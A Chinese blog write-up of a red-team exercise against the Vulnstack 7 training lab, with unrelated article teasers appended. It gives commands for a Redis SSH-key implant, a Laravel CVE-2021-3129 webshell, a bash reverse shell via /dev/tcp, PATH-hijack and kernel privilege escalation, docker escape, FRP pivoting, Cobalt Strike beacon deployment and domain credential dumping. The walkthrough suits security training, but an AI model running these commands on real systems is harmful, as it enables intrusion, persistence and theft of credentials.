当前位置: 首页 > article >正文

红队评估红日靶场7

声明本文所涉及的技术、代码、工具及方法仅供网络安全研究与授权测试使用。未经目标系统所有者书面授权严禁对任何系统进行渗透测试、漏洞探测或攻击行为。作者本人对因滥用本文内容而导致的任何直接或间接后果不承担法律责任。请遵守《中华人民共和国网络安全法》及相关法律法规合法合规地使用技术。未经授权的测试属于违法行为后果自负。环境配置参考redis服务 要用root开启万字讲解内网横向渗透vulnstack七红日靶场7实战全流程-CS上线全部Web1/Web2/PC1/PC2/DC_红日靶场七-CSDN博客靶机下载地址漏洞详情http://vulnstack.qiyuanxuetang.net/vuln/detail/9/信息收集nmap扫描发现端口fscan进行扫描发现存在未授权redis服务还有cve漏洞Redis渗透生成ssh私钥在攻击机中生成一对RSA 非对称加密密钥默认在当前用户.ssh目录下创建私钥文件id_rsa和公钥文件id_rsa.pub该密钥对可用于实现SSH免密登录、数字签名或加密传输等安全认证场景。# 执行密钥生成命令ssh-keygen -t rsa查看生成是公钥cat ~/.ssh/id_rsa.pub写入到Redis服务器redis-cli –h 192.168.152.168依次执行命令config set dir /root/.ssh/ config set dbfilename authorized_keys set marginl \n\n\n\ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZi2rJFX7o4G4r/Fdvs3iNOSfE/ecm77p7mZkkRnMpo6sxIITdZ4PRXmf2MyqypsRKSznZZrs/kDqsfEYp4IplfRvsG32N9WeJgr8WCkdm3kBd9QcxRBCfb7rIanjukKw8YzNfFXKLxVMhKgzfCudtClSc2CZcPcOGCwhqoYqTbZclkIHxCmHx5x7SxMr7pdTP1tWlm2Csar0ASnb9tP/AUkvLlJO9tj0m6rkYgwRcOaftzWwrzyQcXj6q2PToQxDy5tFVyBAI1N610mee9rGrIboEMPeIGlzbNBBl5yCINCRKatqHZMCYQFU0sQJzWNLyoAKEu/fIsVzTj9dEDR4cADHZKfCN2xK2w6JyJ6RkunzykRe9sRfHZEke7xCqLX0VCydeU3R2WMqvSJx6DYU6OJMft0djMtToXgtuNzVpETxRSLDhhy2IGv1eWusuciIZ6mZ7MJpZhUIDazySw3q1bpp8owG0OhSGFIFwElOjVF7BOQnyAhoWVk kalikali \n\n\n save进行ssh连接ssh root192.168.152.168 -i ~/.ssh/id_rsa同时在利用findshell进行ssh连接 方便上传文件认证用上面生成的私钥web渗透laravel渗透访问81端口http://192.168.152.168:81/存在Laravel服务 有现成cvepoc 下面是poc地址https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP执行pocpython laravel-CVE-2021-3129-EXP.py http://192.168.152.168:81成功拿到了连接地址只不过poc版本老 需要哥斯拉2.96https://github.com/BeichenDream/Godzilla/releases/tag/v2.96-godzilla运行java -jar Godzilla-V2.96.jar记得将有效载荷选择为php利用上面运行得到的poc地址 成功连接docker逃逸查看根目录文件ls -la /发现存在docker 需要实现docker逃逸因为交互性很差 所以 我们反弹shell到web1 web1开启一个监听在web2执行反弹shellbash -c exec bash -i /dev/tcp/192.168.52.10/55551成功回连查看suid特权文件 发现有一个shell 一个passwdpasswd 是乱码的那么执行shell看看file /home/jobs/shell发现是elf可执行文件接着查看同目录下的demo.c文件 有一个sysytem(ps)这里考虑PATH环境变量劫持提权攻击cd /tmp echo /bin/bash ps chmod 777 ps echo $PATH export PATH/tmp:$PATH cd /home/jobs ./shell准备恶意程序cd /tmp - 进入可写目录echo /bin/bash ps - 创建一个名为 ps 的文件内容为 /bin/bashchmod 777 ps - 赋予该文件所有用户可执行权限劫持系统命令路径echo $PATH - 查看当前系统的命令搜索路径export PATH/tmp:$PATH - 关键步骤将 /tmp 目录添加到 PATH 环境变量的最前面。这意味着当系统需要执行一个命令时会优先在 /tmp 目录下寻找。触发执行并提权cd /home/jobs./shell - 执行这个SUID程序成功提权开始挂载这里提前把cdk文件 下载到靶机 具体方法可以看我上一篇文章./cdk run mount-disk成功挂载在挂载的目录下发现账号密码 ubuntussh登录ssh ubuntu192.168.52.20web2提权web2下载fscan 然后扫描CVE-2021-3493是Linux内核中的一个高危本地权限提升的安全风险它主要影响Ubuntu系统。攻击者可以利用此它从普通用户权限提升至root权限https://github.com/briskets/CVE-2021-3493将下载的文件上传到靶机攻击机需要开启http服务具体方法参考上一篇文章gcc exploit.c -o exploit_ljn chmod x exploit_ljn ./exploit_ljn成功提权FRP配置第一层反向代理1.下载文件并且解压wget https://ghproxy.net/https://github.com/fatedier/frp/releases/download/v0.61.0/frp_0.61.0_linux_amd64.tar.gz2.配置frpc.toml文件serverAddr 192.168.152.128 serverPort 7000 [[proxies]] name socks5 type tcp remotePort 12347 [proxies.plugin] type socks5kali执行/frps -c frps.toml将frpc frpc.toml上传到web1kali配置代理配置/etc/proxychains4.conf文件添加socks5 0.0.0.0 12347tips:这里还可以利用msf上线 直接添加路由PC1渗透访问PC1的通达OA服务192.168.52.30:8080需要配置socks5代理192.168.59.128:12347利用通达OA工具成功扫出漏洞直接文件上传 然后利用蚁剑连接要配置代理成功拿到shell添加路由kali添加路由ip route add 192.168.152.0/24 dev eth0 route add -net 192.168.52.0 netmask 255.255.255.0 gw 192.168.152.168 eth0Web1添加转发功能sysctl -w net.ipv4.ip_forward1Web2添加路由​ route add -net 192.168.152.0 netmask 255.255.255.0 gw 192.168.52.10 eth0 ​PC1添加路由​ route add 192.168.152.0 mask 255.255.255.0 192.168.52.10 ​成功连通cs上线1.配置监听器https利用cs插件genCrossC2.Win生成linux木马genCrossC2.exe 192.168.59.128 10050 ./.cobaltstrike.beacon_keys null Linux x64 ljn-10050.out raw将生成的out文件放入web1 并且运行cs成功上线web1接着在web1的baecon文件ljn-10050.out目录中执行python3 -m http.server 8888web2下载wget http://192.168.52.10:8888/ljn-10050.out执行木马 成功上线web2再次添加cs监听器选择 payload 类型Beacon HTTP并配置回连的IP地址团队服务器的IP地址192.168.152.128和端口10087任意不冲突即可。生成木马因为蚁剑已经连接了pc1 上传木马文件执行木马文件成功上线pc1pc1抓取哈希明文密码成功拿到域管理员的账号密码进行一些端口扫描 信息收集CS创建SMB监听横向移动手动打开PC1防火墙配置成功上线DC继续上述操作这里我pc2没有成功上线不知道哪里有问题直接拿参考这里的上线pc2参考万字讲解内网横向渗透vulnstack七红日靶场7实战全流程-CS上线全部Web1/Web2/PC1/PC2/DC_红日靶场七-CSDN博客

相关文章:

红队评估红日靶场7

声明 本文所涉及的技术、代码、工具及方法仅供网络安全研究与授权测试使用。 未经目标系统所有者书面授权,严禁对任何系统进行渗透测试、漏洞探测或攻击行为。 作者(本人)对因滥用本文内容而导致的任何直接或间接后果不承担法律责任。 请遵守…...

云容笔谈部署教程(Windows WSL2):NVIDIA CUDA兼容性配置避坑指南

云容笔谈部署教程(Windows WSL2):NVIDIA CUDA兼容性配置避坑指南 1. 前言:为什么需要这份指南 如果你正在Windows电脑上尝试部署云容笔谈系统,很可能已经遇到了各种CUDA相关的报错问题。这不是你的问题,而…...

Linux学习笔记(二十)--网络基础1

计算机网络背景独立模式 状态描述: 这是最原始的阶段。计算机是大型、昂贵且独立的设备(如大型机),没有相互连接。每台计算机都拥有自己的专用外设(打印机、磁带机),运行自己的程序和存储自己的…...

G-Helper:华硕笔记本轻量化控制解决方案详解

G-Helper:华硕笔记本轻量化控制解决方案详解 【免费下载链接】g-helper Lightweight, open-source control tool for ASUS laptops and ROG Ally. Manage performance modes, fans, GPU, battery, and RGB lighting across Zephyrus, Flow, TUF, Strix, Scar, and o…...

为啥学C语言绕不开指针?懂它封神,不懂直接劝退,真相太扎心

一、学C的人,一半栽在指针上,一半靠它拿高薪 无数程序员入门C语言时,都有过同一个崩溃瞬间:对着指针的*和&抓耳挠腮,明明看书上写的是“存储内存地址的变量”,可实操起来却频频报错,甚至直接…...

linux内核 - request_irq 介绍

一:概述GPU在执行任务时,本质上是一个异步设备,由CPU提交任务,GPU执行,那么GPU完成任务后,CPU怎么知道?答案是GPU触发 IRQ,让CPU收到中端信号。 另外有一个核心问题是,硬…...

Qwen3.5-4B-Claude-OpusAI应用:轻量级推理服务嵌入内部知识库方案

Qwen3.5-4B-Claude-OpusAI应用:轻量级推理服务嵌入内部知识库方案 1. 模型概述 Qwen3.5-4B-Claude-4.6-Opus-Reasoning-Distilled-GGUF是基于Qwen3.5-4B的推理蒸馏模型,特别强化了结构化分析、分步骤回答、代码与逻辑类问题的处理能力。该版本以GGUF量…...

零基础玩转CYBER-VISION:手把手教你搭建未来科技风目标分割系统

零基础玩转CYBER-VISION:手把手教你搭建未来科技风目标分割系统 1. 认识CYBER-VISION:助盲眼镜的黑科技大脑 想象一下,视障朋友戴上智能眼镜后,眼前的世界不再是一片模糊,而是被清晰标注出道路、障碍物和关键目标的增…...

OpenClaw极简部署:Kimi-VL-A3B-Thinking云端镜像10分钟快速体验

OpenClaw极简部署:Kimi-VL-A3B-Thinking云端镜像10分钟快速体验 1. 为什么选择云端沙盒体验OpenClaw 上周我在本地尝试部署OpenClaw时,被复杂的依赖项和端口冲突折腾得够呛。正当准备放弃时,偶然发现星图平台提供了预装OpenClaw和Kimi-VL-A…...

终极指南:如何快速重置JetBrains IDE试用期 - ide-eval-resetter完全教程

终极指南:如何快速重置JetBrains IDE试用期 - ide-eval-resetter完全教程 【免费下载链接】ide-eval-resetter 项目地址: https://gitcode.com/gh_mirrors/id/ide-eval-resetter JetBrains IDE试用期管理工具ide-eval-resetter是开发者解决IDE试用期问题的终…...

快速上手LongCat动物百变秀:从安装到出图完整流程

快速上手LongCat动物百变秀:从安装到出图完整流程 1. 认识LongCat动物百变秀 LongCat动物百变秀是一款基于美团开源技术的智能图片编辑工具,它能通过简单的文字描述对动物图片进行创意编辑。想象一下,你只需要上传一张猫咪照片,…...

Windows虚拟手柄驱动终极指南:免费实现游戏控制器100%兼容

Windows虚拟手柄驱动终极指南:免费实现游戏控制器100%兼容 【免费下载链接】ViGEmBus Windows kernel-mode driver emulating well-known USB game controllers. 项目地址: https://gitcode.com/gh_mirrors/vi/ViGEmBus 想要在Windows系统上使用任天堂Switch…...

3步打造高效多平台直播:OBS Multi RTMP插件完整解决方案

3步打造高效多平台直播:OBS Multi RTMP插件完整解决方案 【免费下载链接】obs-multi-rtmp OBS複数サイト同時配信プラグイン 项目地址: https://gitcode.com/gh_mirrors/ob/obs-multi-rtmp 想要突破单一平台限制,实现多平台同步直播却苦于操作复杂…...

千问3.5-2B开源镜像部署教程:4.3GB权重免下载,24GB显存稳定运行

千问3.5-2B开源镜像部署教程:4.3GB权重免下载,24GB显存稳定运行 1. 平台介绍 千问3.5-2B是Qwen系列的小型视觉语言模型,它能够同时理解图片和生成文本。这个模型最特别的地方在于,你可以上传一张图片,然后用自然语言…...

Jasminum:中文文献管理的终极解决方案,三步提升Zotero效率300%

Jasminum:中文文献管理的终极解决方案,三步提升Zotero效率300% 【免费下载链接】jasminum A Zotero add-on to retrive CNKI meta data. 一个简单的Zotero 插件,用于识别中文元数据 项目地址: https://gitcode.com/gh_mirrors/ja/jasminum …...

OpenClaw自动化写作:Qwen3.5-9B解析配图生成技术文章

OpenClaw自动化写作:Qwen3.5-9B解析配图生成技术文章 1. 为什么需要自动化写作工具 作为一名技术博主,我经常遇到这样的困境:手头有一张精心绘制的架构图或流程图,却要花费数小时将其转化为文字描述。更痛苦的是,当文…...

ComfyUI-Manager终极指南:如何快速解决SVD模型加载错误并优化AI工作流

ComfyUI-Manager终极指南:如何快速解决SVD模型加载错误并优化AI工作流 【免费下载链接】ComfyUI-Manager ComfyUI-Manager is an extension designed to enhance the usability of ComfyUI. It offers management functions to install, remove, disable, and enabl…...

笔记草稿本

...

告别手动输入!LaTeX公式一键粘贴到Word的终极解决方案

告别手动输入!LaTeX公式一键粘贴到Word的终极解决方案 【免费下载链接】LaTeX2Word-Equation Copy LaTeX Equations as Word Equations, a Chrome Extension 项目地址: https://gitcode.com/gh_mirrors/la/LaTeX2Word-Equation 还在为复制网页上的数学公式到…...

RexUniNLU与VSCode插件开发:智能代码注释生成工具

RexUniNLU与VSCode插件开发:智能代码注释生成工具 1. 引言 作为一名每天要写几百行代码的程序员,你有没有这样的经历:写完一个复杂的函数后,盯着代码看了半天,却不知道该怎么写注释?或者更常见的是&#…...

XUnity.AutoTranslator终极指南:如何为Unity游戏实现实时自动翻译

XUnity.AutoTranslator终极指南:如何为Unity游戏实现实时自动翻译 【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator XUnity.AutoTranslator是一款功能强大的Unity游戏实时翻译插件,专…...

保姆级教程:用深度学习项目训练环境,10分钟复现你的第一个AI项目

保姆级教程:用深度学习项目训练环境,10分钟复现你的第一个AI项目 1. 环境准备与快速部署 深度学习项目训练环境镜像已经预装了完整的开发环境,包括PyTorch框架、CUDA工具包和常用Python库。这个环境特别适合想要快速开始深度学习项目的新手…...

Hunyuan-MT-7B翻译模型部署问题排查:启动失败、内存不足解决方案

Hunyuan-MT-7B翻译模型部署问题排查:启动失败、内存不足解决方案 1. 问题概述 部署Hunyuan-MT-7B翻译模型时,最常见的两类问题都与资源分配相关: 启动失败:模型加载过程中报错退出内存不足:推理过程中出现OOM&#…...

完全掌握G-Helper:华硕ROG笔记本色彩配置文件一键恢复实战指南

完全掌握G-Helper:华硕ROG笔记本色彩配置文件一键恢复实战指南 【免费下载链接】g-helper Lightweight, open-source control tool for ASUS laptops and ROG Ally. Manage performance modes, fans, GPU, battery, and RGB lighting across Zephyrus, Flow, TUF, S…...

春联生成模型-中文-base实战:输入‘富贵‘、‘吉祥‘,AI自动创作工整对联

春联生成模型-中文-base实战:输入富贵、吉祥,AI自动创作工整对联 1. 快速体验:AI春联生成器 春节将至,贴春联是中国人最重要的年俗之一。但创作一副既工整又寓意美好的春联并非易事,很多人常常为"写什么"而…...

手把手教程:用EagleEye镜像3步实现实时目标检测,小白也能轻松上手

手把手教程:用EagleEye镜像3步实现实时目标检测,小白也能轻松上手 1. 为什么选择EagleEye镜像? 目标检测是计算机视觉中最基础也最重要的任务之一,但传统方法往往面临两个难题:要么速度太慢无法实时处理,…...

FreeMove终极指南:98%成功率的Windows目录迁移神器,让C盘重获新生 [特殊字符]

FreeMove终极指南:98%成功率的Windows目录迁移神器,让C盘重获新生 🚀 【免费下载链接】FreeMove Move directories without breaking shortcuts or installations 项目地址: https://gitcode.com/gh_mirrors/fr/FreeMove 还在为C盘爆满…...

如何快速提升中文文献管理效率:Jasminum插件3大核心功能完整指南

如何快速提升中文文献管理效率:Jasminum插件3大核心功能完整指南 【免费下载链接】jasminum A Zotero add-on to retrive CNKI meta data. 一个简单的Zotero 插件,用于识别中文元数据 项目地址: https://gitcode.com/gh_mirrors/ja/jasminum 还在…...

SAP MRP独立需求与相关需求业务解析

在SAP MRP运行中,正确区分独立需求与相关需求是物料计划准确性的基石,两者对MRP计划结果的生成逻辑有根本性的影响。 一、核心概念区分与业务影响 独立需求与相关需求的本质区别在于其需求来源和计划逻辑,具体对比如下: 对比维…...

Node.js后端调用PyTorch模型:基于PyTorch 2.8镜像构建AI服务

Node.js后端调用PyTorch模型:基于PyTorch 2.8镜像构建AI服务 1. 全栈AI应用架构概述 现代AI应用开发中,将Python生态的深度学习框架与Node.js的高性能Web服务相结合,已经成为一种流行架构模式。这种架构充分利用了PyTorch在模型训练和推理方…...